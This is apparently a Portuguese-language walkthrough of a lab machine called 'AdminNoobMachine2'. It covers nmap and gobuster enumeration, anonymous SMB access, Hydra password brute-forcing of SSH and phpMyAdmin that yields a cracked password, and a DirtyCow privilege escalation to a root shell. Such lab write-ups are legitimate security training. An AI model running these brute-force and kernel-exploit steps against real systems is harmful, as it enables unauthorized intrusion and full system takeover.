AdminNoobMachine2
IP: 10.0.0.14
Enumeration
# nmap -sC -sV -v -Pn 10.0.0.14
...............................
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/old/ /test/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 172.30.2.254
|_ error: Closing link: (nmap@172.30.2.254) [Client exited]
Service Info: Hosts: NOOB2, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -438d23h43m45s, deviation: 5h46m24s, median: -438d20h23m46s
| nbstat: NetBIOS name: NOOB2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| NOOB2<00> Flags: <unique><active>
| NOOB2<03> Flags: <unique><active>
| NOOB2<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: \x00
| NetBIOS computer name: NOOB2\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-07-16T03:31:10+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-15T17:31:10
|_ start_date: N/A
# gobuster dir -e -u http://10.0.0.14 -w /usr/share/dirb/wordlists/big.txt
===============================================================
http://10.0.0.14/.htpasswd (Status: 403) [Size: 285]
http://10.0.0.14/.htaccess (Status: 403) [Size: 285]
http://10.0.0.14/apache (Status: 301) [Size: 306] [--> http://10.0.0.14/apache/]
http://10.0.0.14/javascript (Status: 301) [Size: 310] [--> http://10.0.0.14/javascript/]
http://10.0.0.14/old (Status: 301) [Size: 303] [--> http://10.0.0.14/old/]
http://10.0.0.14/phpmyadmin (Status: 301) [Size: 310] [--> http://10.0.0.14/phpmyadmin/]
http://10.0.0.14/robots.txt (Status: 200) [Size: 48]
http://10.0.0.14/server-status (Status: 403) [Size: 289]
http://10.0.0.14/test (Status: 301) [Size: 304] [--> http://10.0.0.14/test/]
http://10.0.0.14/wordpress (Status: 301) [Size: 309] [--> http://10.0.0.14/wordpress/]
http://10.0.0.14/wp (Status: 301) [Size: 302] [--> http://10.0.0.14/wp/]
# smbclient -L \\\\10.0.0.14\\share$
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
SMB1 disabled -- no workgroup available
# smbclient -N \\\\10.0.0.14\\share$
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jul 9 15:10:24 2020
.. D 0 Mon Aug 14 08:34:47 2017
wordpress D 0 Thu Jul 9 14:58:58 2020
wp D 0 Tue Aug 15 06:51:23 2017
robots.txt N 48 Thu Jul 9 15:02:02 2020
todolist.txt N 60 Thu Jul 9 15:03:51 2020
apache D 0 Mon Aug 14 08:35:19 2017
index.html N 2107 Thu Jul 9 15:10:02 2020
info.php N 20 Tue Aug 15 06:55:19 2017
test D 0 Mon Aug 14 08:35:10 2017
old D 0 Mon Aug 14 08:35:13 2017
No arquivo todolist.txt temos conteúdo:
http://10.0.0.14/todolist.txt - Lembrar de trocar a minha senha atual por uma mais forte!
Outra informação relevante:
view-source:http://10.0.0.14/wordpress/ <!-- O Novo blog da HS sera desenvolvido por rootuser --> <h1> Em breve o novo Blog da HS!!! </h1>
Exploração
Tentei quebrar via brute force o ssh com HYDRA (mas não tive sucesso):
# hydra -vV -l www-data -P /usr/share/john/password.lst -f 10.0.0.14 ssh -t4
# hydra -vV -l root -P /usr/share/john/password.lst -f 10.0.0.14 ssh -t4
# hydra -vV -l rootuser -P /usr/share/john/password.lst -f 10.0.0.14 ssh -t4
Também já fiz algumas tentaticas de brute foce dom hydra no seviço de phpmyadmin (sem sucesso):
# hydra -l rootuser -P /usr/share/john/password.lst -f -V 10.0.0.14 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^:Username"
Finalmente consegui quebrar o acesso ssh do usuário rootuser:
# hydra -vV -l rootuser -P /usr/share/wordlists/rockyou.txt -f 10.0.0.14 ssh -t4
[22][ssh] host: 10.0.0.14 login: rootuser password: metallica1
Pós Exploração
Temos aqui um ubuntu 14.04.5 com kernel versão 4.4
rootuser@noob2:~$ lsb_release -a;uname -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
Linux noob2 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
Basta usar o velho e bom dirycow:
rootuser@noob2:/tmp$ chmod +x cowroot
rootuser@noob2:/tmp$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
thread stopped
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
root@noob2:/tmp# whoami
Last updated